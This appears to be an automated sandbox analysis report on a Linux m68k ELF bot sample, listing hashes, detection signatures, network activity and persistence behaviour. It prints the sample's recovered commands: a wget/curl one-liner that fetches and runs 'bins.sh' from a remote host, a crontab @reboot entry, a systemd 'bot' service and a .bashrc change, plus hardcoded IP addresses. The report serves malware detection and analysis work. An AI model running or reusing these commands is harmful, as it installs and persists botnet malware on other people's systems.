Linux Analysis Report
m68k.elf

Overview

General Information

Sample name: m68k.elf
Analysis ID: 1558937
MD5: d7eaa2bceba9d7e0d2aa38e1ce1a3649
SHA1: 77ca39cd70efba9684b254b9397881c8fb85b71d
SHA256: e5cc8bce6857e01c4c2ccc7ca4cfb47a5578c6a2b940be2e99c122589390fdc1
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: m68k.elf ReversingLabs: Detection: 28%
Source: m68k.elf String: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: m68k.elf String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: m68k.elf String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrc
Source: .bashrc.13.dr String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.dr String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: global traffic TCP traffic: 192.168.2.23:42134 -> 8.8.8.8:53
Source: global traffic TCP traffic: 192.168.2.23:42124 -> 8.8.8.8:53
Source: global traffic TCP traffic: 192.168.2.23:42130 -> 8.8.8.8:53
Source: global traffic TCP traffic: 192.168.2.23:42132 -> 8.8.8.8:53
Source: /bin/curl (PID: 6245) Reads hosts file: /etc/hosts Jump to behavior
Source: /tmp/m68k.elf (PID: 6224) Socket: 127.0.0.1:4161 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: cdn.fwupd.org
Source: global traffic DNS traffic detected: DNS query: host.zopz-api.com
Source: tmp.aHD8f7.22.dr String found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.dr String found in binary or memory: http://serverip/bins/bins.sh;
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39282
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39282 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogm68k->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal60.troj.linELF@0/4@25/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6242) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 6241) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Source: /tmp/m68k.elf (PID: 6226) File written: /root/.bashrc Jump to behavior
Source: /usr/bin/crontab (PID: 6241) File: /var/spool/cron/crontabs/tmp.aHD8f7 Jump to behavior
Source: /usr/bin/crontab (PID: 6241) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/m68k.elf (PID: 6226) File: /root/.bashrc Jump to behavior
Source: /bin/curl (PID: 6245) Directory: /root/.curlrc Jump to behavior
Source: /tmp/m68k.elf (PID: 6234) Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" Jump to behavior
Source: /tmp/m68k.elf (PID: 6250) Shell command executed: sh -c "/bin/systemctl enable bot" Jump to behavior
Source: /bin/sh (PID: 6243) Chmod executable: /usr/bin/chmod -> chmod +x bins.sh Jump to behavior
Source: /bin/sh (PID: 6249) Chmod executable: /usr/bin/chmod -> chmod +x bins.sh Jump to behavior
Source: /usr/bin/dash (PID: 6331) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb Jump to behavior
Source: /usr/bin/dash (PID: 6332) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb Jump to behavior
Source: /bin/sh (PID: 6254) Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot Jump to behavior
Source: /tmp/m68k.elf (PID: 6224) Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 6245) Queries kernel information via 'uname': Jump to behavior
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/m68k
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k
Source: m68k.elf, 6224.1.000055c186832000.000055c1868df000.rw-.sdmp, m68k.elf, 6226.1.000055c186832000.000055c1868df000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k
Source: m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: m68k.elf, 6224.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp, m68k.elf, 6226.1.00007ffc52a56000.00007ffc52a77000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/m68k.elf
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs